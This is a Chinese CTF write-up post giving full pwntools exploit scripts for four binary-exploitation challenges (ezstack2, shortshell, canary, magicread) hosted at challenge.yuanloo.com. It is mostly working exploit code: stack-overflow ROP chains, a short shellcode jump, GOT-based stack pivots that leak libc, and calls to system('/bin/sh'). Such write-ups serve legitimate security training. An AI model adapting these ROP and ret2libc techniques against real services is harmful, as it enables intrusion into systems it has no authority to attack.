历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    源鲁杯ROUND2 Pwn题解
    顾一莘 发表于 北京 CTF 315浏览 · 2024-10-18 19:23

    ezstack2

    栈溢出设置一参为0x114514之后直接劫持到vuln函数

    from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.yuanloo.com', 47708)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

pop_rdi_ret = 0x0000000000400823
ret = 0x000000000040056e

p = b'a' * 0x38 + p64(ret) + p64(pop_rdi_ret) + p64(0x114514) + p64(0x400757)
r.sendline(p)

r.interactive()

    shortshell

    rbx里有地址,直接计算一下jmp过去

    from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.yuanloo.com', 27490)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

'''
sub bl, 0x18
jmp rbx
'''

p = b'\x80\xeb\x1c\xff\xe3'
r.send(p)

r.interactive()

    canary

    控制maingiftrbp,利用gift读的长度大向mainret

    from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.yuanloo.com', 37134)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

stack_check_fail = elf.got['__stack_chk_fail']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x00000000004013e3
puts_got = elf.got['puts']
ret = 0x000000000040101a

r.sendlineafter(b'functions?', b'0')

p = p64(stack_check_fail + 0xa00 - 0x50) + p64(0x401296)
r.send(p)

r.sendlineafter(b'functions?', b'0')

p = p64(stack_check_fail + 0xa00 - 0x8) + p64(0x401258)
r.send(p)

p = p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(ret) + p64(0x401296)
r.send(p)

libc = ELF('./2.31/libc-2.31.so')
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']

r.sendlineafter(b'functions?', b'0')

p = p64(0x404a28 + 0x48) + p64(0x401258)
r.send(p)

system = libc.sym['system'] + libc_base
bin_sh = libc.search(b'/bin/sh\x00').__next__() + libc_base
p = p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
r.send(p)

r.interactive()

    magicread

    栈迁移

    from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.yuanloo.com', 40862)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

bss = 0x601a00
read = 0x400675
start = 0x400510
pop_rdi_ret = 0x0000000000400723
leave_ret = 0x0000000000400691
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

p = b'a' * 0x40 + p64(bss + 0x40) + p64(read)
r.send(p)

p = b'a' * 0x20 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(start) + p64(bss + 0x18) +p64(leave_ret)
r.send(p)

libc = ELF('./2.23_11.3/libc-2.23.so')
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']

p = b'a' * 0x40 + p64(bss + 0x40) + p64(read)
r.send(p)

bin_sh = libc.search(b'/bin/sh\x00').__next__() + libc_base
system = libc.sym['system'] + libc_base
p = b'a' * 0x20 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system) + p64(start) + p64(bss + 0x18) +p64(leave_ret)
r.send(p)

r.interactive()
    0 人收藏 0 人喜欢 转载 分享
    1 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持